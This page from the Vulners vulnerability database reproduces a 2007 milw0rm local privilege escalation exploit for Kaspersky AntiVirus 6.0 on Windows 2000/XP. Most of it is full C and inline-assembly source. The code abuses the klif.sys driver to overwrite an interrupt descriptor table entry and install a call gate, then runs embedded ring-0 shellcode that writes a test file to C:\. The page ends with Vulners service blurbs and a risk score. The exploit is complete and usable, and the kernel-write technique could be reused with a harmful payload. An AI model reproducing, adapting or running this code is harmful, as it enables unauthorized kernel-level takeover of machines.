Vulners
Lucene search
Kaspersky AntiVirus 6.0 - Local Privilege Escalation
// kav 6.0 0day local priv escalation exploit
// by m4d
// http://unl0ck.net
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
// r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)"
unsigned char Shellcode[405] = {
0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B,
0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66,
0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF,
0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00,
0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D,
0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x08, 0x59, 0xFF, 0xD3, 0x89,
0x45, 0xF0, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x0C, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF4, 0x03, 0xD1,
0x89, 0x55, 0xE4, 0x6A, 0x20, 0x58, 0x66, 0x89, 0x45, 0xE0, 0x66, 0x89, 0x45, 0xE2, 0x8D, 0x4D,
0xC0, 0xC7, 0x01, 0x18, 0x00, 0x00, 0x00, 0x83, 0x61, 0x04, 0x00, 0xC7, 0x41, 0x0C, 0x00, 0x02,
0x00, 0x00, 0x83, 0x61, 0x10, 0x00, 0x8D, 0x45, 0xE0, 0x89, 0x41, 0x08, 0x83, 0x61, 0x14, 0x00,
0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x20, 0x6A, 0x03, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x8D, 0x45,
0xD8, 0x50, 0x8D, 0x45, 0xC0, 0x50, 0x68, 0x04, 0x00, 0x10, 0x00, 0x8D, 0x45, 0xBC, 0x50, 0xFF,
0x55, 0xEC, 0x85, 0xC0, 0x75, 0x2D, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x17, 0x8B, 0x45, 0xE4, 0x0F,
0xB7, 0x4D, 0xE0, 0x03, 0xC1, 0x50, 0x8D, 0x45, 0xD8, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF4, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF0, 0xC7, 0x45, 0xE8, 0xEF,
0xBE, 0xAD, 0xDE, 0x61, 0x8B, 0x45, 0xE8, 0xC9, 0xCF, 0x5A, 0x77, 0x43, 0x72, 0x65, 0x61, 0x74,
0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5A, 0x77, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00, 0x5A, 0x77,
0x57, 0x72, 0x69, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5C, 0x00, 0x3F, 0x00, 0x3F, 0x00,
0x5C, 0x00, 0x43, 0x00, 0x3A, 0x00, 0x5C, 0x00, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00,
0x6F, 0x00, 0x2E, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20,
0x66, 0x72, 0x6F, 0x6D, 0x20, 0x72, 0x69, 0x6E, 0x67, 0x2D, 0x30, 0x21, 0x20, 0x3A, 0x29, 0x0D,
0x0A, 0x60, 0x8B, 0x50, 0x3C, 0x8B, 0x54, 0x10, 0x78, 0x03, 0xD0, 0x8B, 0x5A, 0x20, 0x03, 0xD8,
0x33, 0xED, 0x8B, 0x4A, 0x18, 0x51, 0x8B, 0x4C, 0x24, 0x1C, 0x8B, 0x33, 0x03, 0xF0, 0x8B, 0x7C,
0x24, 0x18, 0xF3, 0xA6, 0x59, 0x74, 0x06, 0x45, 0x83, 0xC3, 0x04, 0xE2, 0xE8, 0x8B, 0x4A, 0x24,
0x03, 0xC8, 0x0F, 0xB7, 0x0C, 0x69, 0x8B, 0x6A, 0x1C, 0x03, 0xE8, 0x95, 0x03, 0x2C, 0x88, 0x89,
0x6C, 0x24, 0x1C, 0x61, 0xC3
};
typedef struct _FIRST_PARAM {
ULONG SwitchIndex;
ULONG Unknown; // 0xFF0002...0xFF000F, if this parameters won't be in the list of klif.sys, sploit won't work..
ULONG Value; // this value will rewrite DWORD of memory
} FIRST_PARAM, *PFIRST_PARAM;
void main(int argc, char* argv[])
{
__try
{
FIRST_PARAM Param1;
ULONG Param2; // pointer to write DATA - 8
CHAR Idtr[6];
CHAR IsKAVInstalled;
OSVERSIONINFOEX os;
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((LPOSVERSIONINFO)&os);
if (os.dwPlatformId != VER_PLATFORM_WIN32_NT ||
os.dwMajorVersion != 5 ||
os.dwMinorVersion > 1)
{
printf("This OS version unsupported\n");
return;
}
// Äëÿ íà÷àëà îïðåäåëèì, óñòàíîâëåí ëè KAV èëè íåò
__asm {
cmp os.dwMinorVersion, 0
jnz short $+13
mov eax, 0F8h // 2k
jmp short $+7
mov eax, 11Ch // xp
int 2Eh
cmp eax, 0Ch
setz al
mov IsKAVInstalled, al
}
if (!IsKAVInstalled)
{
printf("KAV6 didn't installed\n");
return;
}
Param1.SwitchIndex = 3; // Index of jmp in case of switch()
Param1.Unknown = 0xFF0002;
__asm {
pusha
sidt Idtr
mov eax, dword ptr [Idtr+2]
add eax, 0DAh * 8 - 8
mov Param2, eax
// Write lower DWORD IdtEntry
mov ecx, offset Shellcode
and ecx, 0000FFFFh
or ecx, 00080000h
mov Param1.Value, ecx // Set DWORD: [selector 0x0008 | LOWORD(Shellcode)]
push Param2
lea eax, Param1
push eax
mov edx, esp
cmp os.dwMinorVersion, 0
jnz short $+13
mov eax, 100h // 2k
jmp short $+7
mov eax, 124h // xp
int 2Eh
add esp, 2*4
// Write high DWORD IdtEntry
add Param2, 4
mov ecx, offset Shellcode
and ecx, 0FFFF0000h
or ecx, 0000EE00h
mov Param1.Value, ecx // Set DWORD: [HIWORD(Shellcode) | gate parameters 0xEE00]
push Param2
lea eax, Param1
push eax
mov edx, esp
cmp os.dwMinorVersion, 0
jnz short $+13
mov eax, 100h // 2k
jmp short $+7
mov eax, 124h // xp
int 2Eh
add esp, 2*4
// Call Gate :-) (COLGATE)
push fs
int 0DAh
pop fs
popa
}
printf("Exploited successful\n");
}
__except(1) {
printf("Can't create interrupt gate\n");
}
}
// 15.01.07 MaD
// milw0rm.com [2007-01-15]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4